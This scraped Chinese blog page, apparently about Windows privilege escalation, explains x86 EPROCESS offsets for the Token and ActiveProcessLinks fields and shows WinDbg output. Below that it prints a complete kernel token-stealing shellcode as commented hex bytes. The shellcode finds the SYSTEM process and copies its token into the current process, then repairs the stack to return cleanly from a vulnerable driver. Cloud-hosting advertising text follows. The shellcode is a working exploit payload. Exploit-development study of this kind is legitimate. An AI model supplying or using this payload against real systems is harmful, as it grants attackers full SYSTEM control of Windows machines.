標籤:store protect ima flink ble creation 擷取 work 迴圈
1. 使用tokenPROCESS 結構中的Token 位移,在x86 系統中位移0xf8
進程由雙鏈表組成,通過_LIST_ENTRY 來連結,通過迴圈進程位移0xb8 來擷取所有進程位移0xb8的地址
kd> !process 0 0 systemPROCESS 860dac78 SessionId: none Cid: 0004 Peb: 00000000 ParentCid: 0000 DirBase: 00185000 ObjectTable: 8c001bb8 HandleCount: 518. Image: Systemkd> dt _EPROCESS 860dac78 ntdll!_EPROCESS +0x000 Pcb : _KPROCESS +0x098 ProcessLock : _EX_PUSH_LOCK +0x0a0 CreateTime : _LARGE_INTEGER 0x1d3f694`30d11160 +0x0a8 ExitTime : _LARGE_INTEGER 0x0 +0x0b0 RundownProtect : _EX_RUNDOWN_REF +0x0b4 UniqueProcessId : 0x00000004 Void +0x0b8 ActiveProcessLinks : _LIST_ENTRY [ 0x870676d8 - 0x8416f368 ] +0x0c0 ProcessQuotaUsage : [2] 0 +0x0c8 ProcessQuotaPeak : [2] 0 +0x0d0 CommitCharge : 0xb +0x0d4 QuotaBlock : 0x841631c0 _EPROCESS_QUOTA_BLOCK +0x0d8 CpuQuotaBlock : (null) +0x0dc PeakVirtualSize : 0x770000 +0x0e0 VirtualSize : 0x1f0000 +0x0e4 SessionProcessLinks : _LIST_ENTRY [ 0x0 - 0x0 ] +0x0ec DebugPort : (null) +0x0f0 ExceptionPortData : (null) +0x0f0 ExceptionPortValue : 0 +0x0f0 ExceptionPortState : 0y000 +0x0f4 ObjectTable : 0x8c001bb8 _HANDLE_TABLE +0x0f8 Token : _EX_FAST_REF +0x0fc WorkingSetPage : 0 +0x100 AddressCreationLock : _EX_PUSH_LOCK +0x104 RotateInProgress : (null) +0x108 ForkInProgress : (null) SHELLCODE
"\x60" // pushad ; Save register state on the Stack "\x64\xA1\x24\x01\x00\x00" // mov eax, fs:[KTHREAD_OFFSET] ; nt!_KPCR.PcrbData.CurrentThread "\x8B\x40\x50" // mov eax, [eax + EPROCESS_OFFSET] ; nt!_KTHREAD.ApcState.Process "\x89\xC1" // mov ecx, eax (Current _EPROCESS structure) "\x8B\x98\xF8\x00\x00\x00" // mov ebx, [eax + TOKEN_OFFSET] ; nt!_EPROCESS.Token //---[Copy System PID token] "\xBA\x04\x00\x00\x00" // mov edx, 4 (SYSTEM PID) ; PID 4 -> System "\x8B\x80\xB8\x00\x00\x00" // mov eax, [eax + FLINK_OFFSET] <-| ; nt!_EPROCESS.ActiveProcessLinks.Flink "\x2D\xB8\x00\x00\x00" // sub eax, FLINK_OFFSET | "\x39\x90\xB4\x00\x00\x00" // cmp [eax + PID_OFFSET], edx | ; nt!_EPROCESS.UniqueProcessId "\x75\xED" // jnz ->| ; Loop !(PID=4) "\x8B\x90\xF8\x00\x00\x00" // mov edx, [eax + TOKEN_OFFSET] ; System nt!_EPROCESS.Token "\x89\x91\xF8\x00\x00\x00" // mov [ecx + TOKEN_OFFSET], edx ; Replace Current Process token //---[Recover] "\x61" // popad ; Restore register state from the Stack "\x81\xC4\x8C\x07\x00\x00" // add esp,0x78c ; Offset of IRP on stack "\x8B\x3C\x24" // mov edi,DWORD PTR [esp] ; Restore the pointer to IRP "\x83\xC4\x08" // add esp,0x8 ; Offset of DbgPrint string "\x8B\x1C\x24" // mov ebx,DWORD PTR [esp] ; Restore the DbgPrint string "\x81\xC4\x34\x02\x00\x00" // add esp,0x234 ; Target frame to return "\x31\xC0" // NTSTATUS -> STATUS_SUCCESS :p "\x5D" // pop ebp ; Restore saved EBP "\xC2\x08\x00" // ret 8 ; Return cleanlywindows 提權
Start building with 50+ products and up to 12 months usage for Elastic Compute Service
1 on 1 presale consultation
24/7 Technical Support 6 Free Tickets per Quarter Faster Response
Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.
A comprehensive suite of global cloud computing services to power your business
Payment Methods We Support
